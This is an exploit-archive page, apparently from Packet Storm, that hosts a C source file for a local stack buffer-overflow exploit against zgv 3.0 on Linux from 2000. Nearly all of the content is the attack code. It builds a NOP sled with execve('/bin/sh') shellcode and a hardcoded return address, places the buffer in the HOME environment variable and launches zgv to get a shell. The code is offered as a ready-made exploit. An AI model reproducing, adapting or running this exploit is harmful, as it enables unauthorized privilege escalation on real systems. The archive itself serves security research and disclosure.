what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

zgv-exploit.c

zgv-exploit.c
Posted Sep 13, 2000
Authored by Slash | Site b0f.freebsd.lublin.pl

Zgv 3.0 local exploit for Linux.

tags | exploit, local
systems | linux
SHA-256 | 97a09fdb60023de0734f695a952ce7ceec2f4651602772ae2bbd81286136ebe7

zgv-exploit.c

Change Mirror Download
/* 
zgv 3.0 local linux sample exploit
by slash / buffer0verfl0w security
<tcsh@b0f.i-p.com> <b0f.freebsd.lublin.pl>

Initial exploit version by Mixter <mixter@newyorkoffice.com>
*/

#include <stdio.h>
#include <stdlib.h>

#define NOPS 0x90 // No operation instruction
#define BUFLEN 1032 // Our buffer size
#define RETADDR 0xbffff574 // Change this if it doesn't suit Youre needs
#define PATH "/usr/bin/zgv" // Path to the program

char shellcode[]= // execve("/bin/sh");
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main()
{
char buf[BUFLEN];
long retaddr = RETADDR;
int i;

printf("######################################\n");
printf("# zgv 3.0 local linux sample exploit #\n");
printf("# by slash / buffer0verfl0w security #\n");
printf("######################################\n");
printf("# Using return address 0x%lx\n",retaddr);
printf("# Using buffer size %d\n", strlen(buf));

// Build the overflow string.
for (i = 0; i < BUFLEN; i += 4)
*(long *) &buf[i] = retaddr;

// Copy the NOPS in to the buffer leaving space for
// the shellcode.
memset(buf, NOPS, BUFLEN - strlen(shellcode) - 100);

// Copy the shellcode into the buffer.
memcpy(buf + (BUFLEN - strlen(shellcode) - 100), shellcode, strlen(shellcode));
setenv("HOME", buf, 1);

// Execute the program
execlp("PATH", "zgv", 0);
return 0;
}
/* www.hack.co.za [5 September 2000]*/
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close